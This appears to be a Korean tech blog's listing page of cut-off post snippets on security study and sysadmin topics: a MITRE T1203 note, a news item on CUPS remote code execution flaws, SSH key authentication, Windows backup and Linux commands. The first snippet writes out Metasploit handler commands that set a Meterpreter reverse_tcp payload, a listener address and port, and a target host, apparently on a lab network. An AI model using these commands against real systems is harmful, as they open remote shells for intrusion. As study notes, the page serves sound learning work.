장인테크 JanginTech

0. 세션연결use exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.86.130set LPORT 4444exploit 1. Exploit 취약점 공격 (T1203: Exploitation for Client Execution)목적: 클라이언트 측 소프트웨어나 시스템의 취약점을 이용하여 악성 코드를 실행.과정:[과정]1.set RHOST set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST set LPORT  set RHOSTS 192.168.86.134set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192...

1. CUPS flaws enable Linux remote code execution, but there’s a catchhttps://www.bleepingcomputer.com/news/security/cups-flaws-enable-linux-remote-code-execution-but-theres-a-catch/ CUPS flaws enable Linux remote code execution, but there’s a catchUnder certain conditions, attackers can chain a set of vulnerabilities in multiple components of the CUPS open-source printing system to execute arbit..

1.Linux: SSH and Key-Based Authenticationhttps://thenewstack.io/linux-ssh-and-key-based-authentication/ Linux: SSH and Key-Based AuthenticationLearning to leverage SSH is an essential Linux sysadmin skill. This article covers basic SSH configurations, password-based authentication, and general security settings.thenewstack.io  [ 요약 ]Linux: pw를 통한 SSH 연결 설정1. 인증하려는 특정 호스트 네임이나 IP 주소를 타겟팅  원격 사용자 ..

Windows Server 백업을 실행하는 방법[시작] - [실행] - diskpart 명령 실행 Linux 명령어1. 변경(change) chage : 사용자 pw 만료기간 및 시간 정보 변경chgrp : 그룹 변경chmod : 권한 변경usermod : 사용자정보 변경 Linux 디렉터리디렉터리내용*/etc환경 파일 설정, 시스템 설정 파일, 사용자/그룹 정보/bin기본 명령어/var시스템에 사용하는 가변적인 파일 등/dev각종 디바이스 IP Addressnslookup [도메인] :  도메인 입력하면 IP 주소 보여줌. IP가 도메인에 등록되었는지 확인tracert : IP 패킷이 목적지 도달까지 방문하는 G/W 순서 정보 제공  FSRM(File Server Resource Manager)파일서버..